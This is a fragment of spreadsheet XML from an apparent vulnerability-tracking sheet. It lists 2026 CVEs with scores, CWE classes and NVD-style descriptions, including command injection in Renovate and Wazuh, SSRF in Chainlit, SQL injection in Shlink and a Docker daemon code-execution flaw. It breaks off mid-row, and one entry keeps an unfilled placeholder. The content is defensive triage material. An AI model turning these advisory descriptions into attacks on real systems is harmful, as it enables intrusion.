      <c r="F1185" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1185" s="5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="H1185" s="5" t="inlineStr"/>
      <c r="I1185" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1185" s="5" t="inlineStr"/>
      <c r="K1185" s="5" t="inlineStr">
        <is>
          <t>CWE-379</t>
        </is>
      </c>
      <c r="L1185" s="5" t="inlineStr">
        <is>
          <t>Creation of a temporary file in a directory with insecure permissions in the FPGA management tool installation component in AWS FPGA Development Kit (aws-fpga) before 2.3.4 might allow local users to execute arbitrary code with root privileges via crafted shell content placed at a predictable path in a world-writable temporary directory, which the installation step reads after elevating its own privileges.
To remediate this issue, users should upgrade to version 2.3.4.</t>
        </is>
      </c>
      <c r="M1185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85028</t>
        </is>
      </c>
    </row>
    <row r="1186">
      <c r="A1186" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88885</t>
        </is>
      </c>
      <c r="C1186" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D1186" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1186" s="5" t="inlineStr"/>
      <c r="F1186" s="5" t="inlineStr"/>
      <c r="G1186" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H1186" s="5" t="inlineStr"/>
      <c r="I1186" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1186" s="5" t="inlineStr"/>
      <c r="K1186" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1186" s="5" t="inlineStr">
        <is>
          <t>Renovate before 44.14.7 contains a command injection vulnerability in the gomod manager when processing unescaped depName parameters in import-path update commands with binarySource=docker mode. Attackers can inject shell metacharacters through malicious dependency names to execute arbitrary commands as the Renovate user during Go module major version updates with postUpdateOptions gomodUpdateImportPaths enabled.</t>
        </is>
      </c>
      <c r="M1186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88885</t>
        </is>
      </c>
    </row>
    <row r="1187">
      <c r="A1187" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88888</t>
        </is>
      </c>
      <c r="C1187" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D1187" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1187" s="5" t="inlineStr"/>
      <c r="F1187" s="5" t="inlineStr"/>
      <c r="G1187" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H1187" s="5" t="inlineStr"/>
      <c r="I1187" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1187" s="5" t="inlineStr"/>
      <c r="K1187" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1187" s="5" t="inlineStr">
        <is>
          <t>Renovate before 44.14.7 contains a command injection vulnerability in the Mix manager when processing private dependencies with unescaped organization parameters. Attackers can inject shell metacharacters through malicious package names to execute arbitrary commands as the Renovate user in binarySource=docker mode.</t>
        </is>
      </c>
      <c r="M1187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88888</t>
        </is>
      </c>
    </row>
    <row r="1188">
      <c r="A1188" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0310</t>
        </is>
      </c>
      <c r="C1188" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D1188" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1188" s="5" t="inlineStr"/>
      <c r="F1188" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1188" s="5" t="inlineStr">
        <is>
          <t>palo alto</t>
        </is>
      </c>
      <c r="H1188" s="5" t="inlineStr"/>
      <c r="I1188" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1188" s="5" t="inlineStr"/>
      <c r="K1188" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1188" s="5" t="inlineStr">
        <is>
          <t>A buffer overflow vulnerability in the XML processing functionality of Palo Alto Networks PAN-OS® software enables an unauthenticated attacker with network access to the management web or dataplane interface to cause a denial of service (DoS) condition on VM-Series firewalls or execute arbitrary code with root privileges on the PA-Series firewalls.
The security risk posed by this issue is minimized when the management interface is restricted to only trusted internal IP addresses according to our recommended  best practice deployment guidelines https://live.paloaltonetworks.com/t5/community-blogs/tips-amp-tricks-how-to-secure-the-management-access-of-your-palo/ba-p/464431 . 
Panorama is impacted by this vulnerability.</t>
        </is>
      </c>
      <c r="M1188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0310</t>
        </is>
      </c>
    </row>
    <row r="1189">
      <c r="A1189" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19769</t>
        </is>
      </c>
      <c r="C1189" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D1189" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1189" s="5" t="inlineStr"/>
      <c r="F1189" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1189" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1189" s="5" t="inlineStr"/>
      <c r="I1189" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1189" s="5" t="inlineStr"/>
      <c r="K1189" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1189" s="5" t="inlineStr">
        <is>
          <t>The Ninja Forms – The Contact Form Builder That Grows With You plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Repeater Child 'type' Confusion via Unmatched Array Key in all versions up to, and including, 3.15.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Exploitation requires the Ninja Forms File Uploads add-on to be active, as the attack routes the unwhitelisted child entry through the File Uploads handler to write an attacker-supplied HTML file containing arbitrary JavaScript into any web-server-writable directory, including the site root, where it is served from the site's own origin.</t>
        </is>
      </c>
      <c r="M1189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19769</t>
        </is>
      </c>
    </row>
    <row r="1190">
      <c r="A1190" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27459</t>
        </is>
      </c>
      <c r="C1190" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D1190" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1190" s="5" t="inlineStr"/>
      <c r="F1190" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1190" s="5" t="inlineStr">
        <is>
          <t>openssl, python</t>
        </is>
      </c>
      <c r="H1190" s="5" t="inlineStr">
        <is>
          <t>pyopenssl:pyopenssl</t>
        </is>
      </c>
      <c r="I1190" s="5" t="inlineStr">
        <is>
          <t>2026-03-18</t>
        </is>
      </c>
      <c r="J1190" s="5" t="inlineStr"/>
      <c r="K1190" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="L1190" s="5" t="inlineStr">
        <is>
          <t>pyOpenSSL is a Python wrapper around the OpenSSL library. Starting in version 22.0.0 and prior to version 26.0.0, if a user provided callback to `set_cookie_generate_callback` returned a cookie value greater than 256 bytes, pyOpenSSL would overflow an OpenSSL provided buffer. Starting in version 26.0.0, cookie values that are too long are now rejected.</t>
        </is>
      </c>
      <c r="M1190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27459</t>
        </is>
      </c>
    </row>
    <row r="1191">
      <c r="A1191" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41567</t>
        </is>
      </c>
      <c r="C1191" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D1191" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1191" s="5" t="inlineStr"/>
      <c r="F1191" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1191" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H1191" s="5" t="inlineStr"/>
      <c r="I1191" s="5" t="inlineStr">
        <is>
          <t>2026-06-05</t>
        </is>
      </c>
      <c r="J1191" s="5" t="inlineStr"/>
      <c r="K1191" s="5" t="inlineStr">
        <is>
          <t>CWE-427</t>
        </is>
      </c>
      <c r="L1191" s="5" t="inlineStr">
        <is>
          <t>Moby is an open source container framework. In versions prior to 29.5.1 and in moby/moby v2 prior to v2.0.0-beta.14, when a compressed archive is uploaded to a container via `PUT /containers/{id}/archive` or piped through `docker cp -`, the daemon resolves decompression binaries (such as `xz` or `unpigz`) from the container's filesystem rather than the host's due to incorrect ordering of operations. A malicious container image containing a trojanized decompression binary can achieve arbitrary code execution with full daemon privileges, including host root UID and unrestricted capabilities, when a user uploads a compressed (xz or gzip) archive into that container. This issue is fixed in Docker Engine 29.5.1 and moby/moby v2.0.0-beta.14. Workarounds include only running containers from trusted images, using authorization plugins to restrict access to the `PUT /containers/{id}/archive` endpoint, and avoiding piping compressed archives into containers created from untrusted images</t>
        </is>
      </c>
      <c r="M1191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41567</t>
        </is>
      </c>
    </row>
    <row r="1192">
      <c r="A1192" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45019</t>
        </is>
      </c>
      <c r="C1192" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D1192" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1192" s="5" t="inlineStr"/>
      <c r="F1192" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1192" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1192" s="5" t="inlineStr"/>
      <c r="I1192" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1192" s="5" t="inlineStr"/>
      <c r="K1192" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1192" s="5" t="inlineStr">
        <is>
          <t>Chainlit is a Python framework for building production-ready conversational AI applications. From 2.4.0rc0 until 2.12.0, Chainlit deployments with features.mcp.enabled set to true in .chainlit/config.toml expose the POST /mcp endpoint without requiring authentication. For sse and streamable-http transports, ConnectSseMCPRequest and ConnectStreamableHttpMCPRequest in backend/chainlit/types.py accept a user-controlled url and optional headers dictionary without scheme validation, private-address filtering, or an allowlist. The connect_mcp handler in backend/chainlit/server.py passes these values to sse_client() or streamablehttp_client(), allowing the Chainlit server to make blind outbound requests to arbitrary internal or external services, including cloud metadata endpoints, with attacker-controlled Authorization and Cookie headers. The SSE URL sink has existed since 2.4.0rc0, while attacker-controlled header forwarding and streamable-http support were added in 2.6.4. The response is consumed internally and not returned, but the attacker can issue state-changing authenticated requests, discover internal services, scan ports, and probe metadata endpoints. This issue is fixed in version 2.12.0.</t>
        </is>
      </c>
      <c r="M1192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45019</t>
        </is>
      </c>
    </row>
    <row r="1193">
      <c r="A1193" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70608</t>
        </is>
      </c>
      <c r="C1193" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D1193" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1193" s="5" t="inlineStr"/>
      <c r="F1193" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1193" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1193" s="5" t="inlineStr"/>
      <c r="I1193" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J1193" s="5" t="inlineStr"/>
      <c r="K1193" s="5" t="inlineStr">
        <is>
          <t>CWE-1021, CWE-693</t>
        </is>
      </c>
      <c r="L1193" s="5" t="inlineStr">
        <is>
          <t>Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 39.8.10, 41.10.3, and 42.0.1, a sandboxed iframe without the allow-popups keyword could still open a new window or trigger setWindowOpenHandler with no user interaction because new-window navigations taking the OpenURL path did not apply the iframe sandbox popup restriction. Apps that embed untrusted content in sandboxed iframes and rely on the absence of allow-popups to prevent window creation are affected, while apps that deny window creation in setWindowOpenHandler or do not embed untrusted content in sandboxed iframes are not affected. This issue is fixed in 39.8.10, 41.10.3, and 42.0.1.</t>
        </is>
      </c>
      <c r="M1193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70608</t>
        </is>
      </c>
    </row>
    <row r="1194">
      <c r="A1194" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73624</t>
        </is>
      </c>
      <c r="C1194" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D1194" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1194" s="5" t="inlineStr"/>
      <c r="F1194" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1194" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1194" s="5" t="inlineStr"/>
      <c r="I1194" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1194" s="5" t="inlineStr"/>
      <c r="K1194" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="L1194" s="5" t="inlineStr">
        <is>
          <t>GitPython versions before 3.1.54 contain an arbitrary file overwrite vulnerability in the Diffable.diff method that fails to validate git options passed through kwargs. Attackers can supply the --output argument via the other parameter or output kwarg to write patch content to attacker-chosen file paths at process privilege level.</t>
        </is>
      </c>
      <c r="M1194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73624</t>
        </is>
      </c>
    </row>
    <row r="1195">
      <c r="A1195" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81349</t>
        </is>
      </c>
      <c r="C1195" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D1195" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1195" s="5" t="inlineStr"/>
      <c r="F1195" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1195" s="5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="H1195" s="5" t="inlineStr"/>
      <c r="I1195" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1195" s="5" t="inlineStr"/>
      <c r="K1195" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1195" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an os command ('os command injection') in Azure HDInsights allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81349</t>
        </is>
      </c>
    </row>
    <row r="1196">
      <c r="A1196" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82071</t>
        </is>
      </c>
      <c r="C1196" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D1196" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1196" s="5" t="inlineStr"/>
      <c r="F1196" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1196" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H1196" s="5" t="inlineStr"/>
      <c r="I1196" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1196" s="5" t="inlineStr"/>
      <c r="K1196" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1196" s="5" t="inlineStr">
        <is>
          <t>Insufficient validation of storage engine configuration options in MongoDB Server allows an authenticated user with write privileges to supply crafted parameters during collection creation that override internal storage metadata. This results in an out-of-bounds memory write in the server process, causing a denial of service via server crash, with potential for further impact including arbitrary code execution.</t>
        </is>
      </c>
      <c r="M1196" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82071</t>
        </is>
      </c>
    </row>
    <row r="1197">
      <c r="A1197" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1197" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84387</t>
        </is>
      </c>
      <c r="C1197" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D1197" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1197" s="5" t="inlineStr"/>
      <c r="F1197" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1197" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="H1197" s="5" t="inlineStr"/>
      <c r="I1197" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1197" s="5" t="inlineStr"/>
      <c r="K1197" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L1197" s="5" t="inlineStr">
        <is>
          <t>A improper neutralization of special elements used in a command ('command injection') vulnerability in Fortinet FortiSandbox 5.2.0, FortiSandbox 5.0.0 through 5.0.6, FortiSandbox 4.4.0 through 4.4.9 may allow attacker to execute unauthorized code or commands via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="M1197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84387</t>
        </is>
      </c>
    </row>
    <row r="1198">
      <c r="A1198" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1198" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-14047</t>
        </is>
      </c>
      <c r="C1198" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1198" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1198" s="5" t="inlineStr"/>
      <c r="F1198" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1198" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1198" s="5" t="inlineStr">
        <is>
          <t>elastic:winlogbeat</t>
        </is>
      </c>
      <c r="I1198" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1198" s="5" t="inlineStr"/>
      <c r="K1198" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L1198" s="5" t="inlineStr">
        <is>
          <t>A local vulnerability in the Winlogbeat Windows installer caused runtime files to be placed in a directory writable by unprivileged users. A low-privileged attacker with existing access to the system could pre-position malicious filesystem links, causing a subsequent elevated Winlogbeat operation to write to or delete arbitrary files. Successful exploitation could result in a denial of service.</t>
        </is>
      </c>
      <c r="M1198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-14047</t>
        </is>
      </c>
    </row>
    <row r="1199">
      <c r="A1199" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17627</t>
        </is>
      </c>
      <c r="C1199" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1199" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1199" s="5" t="inlineStr"/>
      <c r="F1199" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1199" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, ibm</t>
        </is>
      </c>
      <c r="H1199" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I1199" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1199" s="5" t="inlineStr"/>
      <c r="K1199" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1199" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.10.2 could allow a remote authenticated attacker to obtain sensitive information and inject messages into workflow history due to improper authorization.</t>
        </is>
      </c>
      <c r="M1199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17627</t>
        </is>
      </c>
    </row>
    <row r="1200">
      <c r="A1200" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18737</t>
        </is>
      </c>
      <c r="C1200" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1200" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1200" s="5" t="inlineStr"/>
      <c r="F1200" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1200" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H1200" s="5" t="inlineStr"/>
      <c r="I1200" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J1200" s="5" t="inlineStr"/>
      <c r="K1200" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1200" s="5" t="inlineStr">
        <is>
          <t>Shlink contains a blind SQL injection vulnerability that allows any authenticated API key holder to inject arbitrary SQL fragments by supplying an unvalidated direction value in the orderBy query parameter of the tag statistics endpoint. Attackers can craft a malicious direction string containing SQL subqueries that flows unsanitized into a Doctrine QueryBuilder ORDER BY clause, enabling time-based, boolean-oracle, and error-based extraction of sensitive data including long URLs, visitor records, IP addresses, geolocation data, user agents, and hashed API key secrets from any tenant.</t>
        </is>
      </c>
      <c r="M1200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18737</t>
        </is>
      </c>
    </row>
    <row r="1201">
      <c r="A1201" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1201" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19671</t>
        </is>
      </c>
      <c r="C1201" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1201" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1201" s="5" t="inlineStr"/>
      <c r="F1201" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1201" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H1201" s="5" t="inlineStr"/>
      <c r="I1201" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1201" s="5" t="inlineStr"/>
      <c r="K1201" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="L1201" s="5" t="inlineStr">
        <is>
          <t>Malcolm's upload-processing pipeline (scripts/safe-extract.py) enforces entry-count, nesting-depth, and total-uncompressed-byte limits when extracting container archives (zip/tar/rar/7z via libarchive), but those limits are not applied when the uploaded file is a single-stream compressed format (.gz, .bz2, .xz, .lzma, .lz) that isn't a .tar.*-style archive. Any authenticated user permitted to upload PCAP/log files can upload a small, highly compressible file (e.g. a gzip bomb) that decompresses to an effectively unbounded size on disk, exhausting the shared Docker volume used by OpenSearch, Logstash, Arkime, and Zeek, and disrupting the platform for all users.</t>
        </is>
      </c>
      <c r="M1201" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19671</t>
        </is>
      </c>
    </row>
    <row r="1202">
      <c r="A1202" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20293</t>
        </is>
      </c>
      <c r="C1202" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1202" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1202" s="5" t="inlineStr"/>
      <c r="F1202" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1202" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="H1202" s="5" t="inlineStr"/>
      <c r="I1202" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1202" s="5" t="inlineStr"/>
      <c r="K1202" s="5" t="inlineStr">
        <is>
          <t>CWE-749</t>
        </is>
      </c>
      <c r="L1202" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="M1202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20293</t>
        </is>
      </c>
    </row>
    <row r="1203">
      <c r="A1203" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48494</t>
        </is>
      </c>
      <c r="C1203" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1203" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1203" s="5" t="inlineStr"/>
      <c r="F1203" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1203" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H1203" s="5" t="inlineStr"/>
      <c r="I1203" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1203" s="5" t="inlineStr"/>
      <c r="K1203" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1203" s="5" t="inlineStr">
        <is>
          <t>TypeBot is a chatbot builder tool. In version 3.16.1, an authenticated user who has read access to any typebot can resume a WhatsApp preview webhook session that belongs to a different typebot by mixing an authorized `typebotId` and `blockId` and a foreign preview phone number tied to another preview session. The WhatsApp test-webhook handler authorizes the parent typebot first, but then resolves the preview chat session only by `wa-preview-{phone}`. As a result, an attacker can inject arbitrary webhook JSON into another workspace's WhatsApp preview session and advance its draft/unpublished flow without any access to the victim typebot. Version 3.17.0 patches the issue.</t>
        </is>
      </c>
      <c r="M1203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48494</t>
        </is>
      </c>
    </row>
    <row r="1204">
      <c r="A1204" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54085</t>
        </is>
      </c>
      <c r="C1204" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D1204" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1204" s="5" t="inlineStr"/>
      <c r="F1204" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1204" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1204" s="5" t="inlineStr"/>
      <c r="I1204" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1204" s="5" t="inlineStr"/>
      <c r="K1204" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="L1204" s="5" t="inlineStr">
        <is>
          <t>Wazuh is an open-source security platform providing unified XDR and SIEM protection for endpoints and cloud workloads. In versions 4.2.0 through 4.14.6, multiple active response scripts pass attacker-influenced alert fields to privileged system commands without validating their format, allowing argument injection into tools that run as root. Five of the eight scripts that handle the srcip field, route-null.c, netsh.c, pf.c, npf.c, and ipfw.c, omit the get_ip_version() check that rejects non-IP input, and disable-account.c passes the dstuser field to passwd/chuser with only a comparison against "root". An attacker who can inject crafted log events, for example via syslog, can supply srcip or dstuser values that, when an active response rule triggers, are passed unvalidated to firewall and account-management commands such as pfctl, npfctl, ipfw, route, netsh, and passwd. This enables injecting additional command arguments, and on Windows the unquoted CreateProcess command-line concatenation in wpopenv() lets a srcip containing spaces add further arguments, while disable-account.c can be abused to lock 